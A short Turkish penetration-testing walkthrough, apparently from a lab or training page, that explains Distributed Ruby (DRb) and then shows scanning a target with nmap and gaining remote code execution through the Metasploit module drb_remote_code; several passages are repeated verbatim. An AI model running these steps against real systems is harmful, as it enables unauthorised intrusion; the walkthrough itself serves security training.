DRB Nedir?
DRb (Distributed Ruby) ağ üzerinden veya aynı sistemdeki ruby uygulamalarının birbiri ile iletişim kurmasına yarayan bir kütüphanedir.
Böylece farklı bir Ruby prosesindeki bir nesne RMI / RPC ile çağırılabilir.
DRb (Distributed Ruby) ağ üzerinden veya aynı sistemdeki ruby uygulamalarının birbiri ile iletişim kurmasına yarayan bir kütüphanedir.
Böylece farklı bir Ruby prosesindeki bir nesne RMI / RPC ile çağırılabilir.
Revealed content
sızma: drb exploit’i bulunmaktadır.
exploit: exploit/linux/misc/drb_remote_code
Adım 1: Aktif Bilgi Toplama
"nmap" yazılımının "-sV,-O,-p-" parametreleriyle hedefe sistemde port taraması yapıyorum.
-sV : versiyon bilgisini verir.
-O : işletim sistemi bilgisini verir.
-p- : tüm portların taranacağı anlamına gelir
Adım 2: Erişim Elde Etme
metasploit’in hatasız çalışması için postgresql servisini başlatıyorum.
"msfconsole -q" : metasploit’i banner’sız çalıştırıyorum.
"search drb" : drb ile alakalı arama yapıyorum.
"use exploit/linux/misc/drb_remote_code: exploit işlemini gerçekleştirecek modülün içine giriyorum.
"show options" : modülün ayalarını görüyorum.
"set RHOST" : hedef sistemin IP adresini veriyorum.
"set RPORT" : hedef sistemdeki drb servisinin çalıştığı portlardan birini seçiyorum.
"exploit" : exploit işlemini başlatıyorum.
ve puf başarılı !
exploit: exploit/linux/misc/drb_remote_code
Adım 1: Aktif Bilgi Toplama
"nmap" yazılımının "-sV,-O,-p-" parametreleriyle hedefe sistemde port taraması yapıyorum.
-sV : versiyon bilgisini verir.
-O : işletim sistemi bilgisini verir.
-p- : tüm portların taranacağı anlamına gelir
Adım 2: Erişim Elde Etme
metasploit’in hatasız çalışması için postgresql servisini başlatıyorum.
"msfconsole -q" : metasploit’i banner’sız çalıştırıyorum.
"search drb" : drb ile alakalı arama yapıyorum.
"use exploit/linux/misc/drb_remote_code: exploit işlemini gerçekleştirecek modülün içine giriyorum.
"show options" : modülün ayalarını görüyorum.
"set RHOST" : hedef sistemin IP adresini veriyorum.
"set RPORT" : hedef sistemdeki drb servisinin çalıştığı portlardan birini seçiyorum.
"exploit" : exploit işlemini başlatıyorum.
ve puf başarılı !
Bu içeriği görmek için giriş yapın.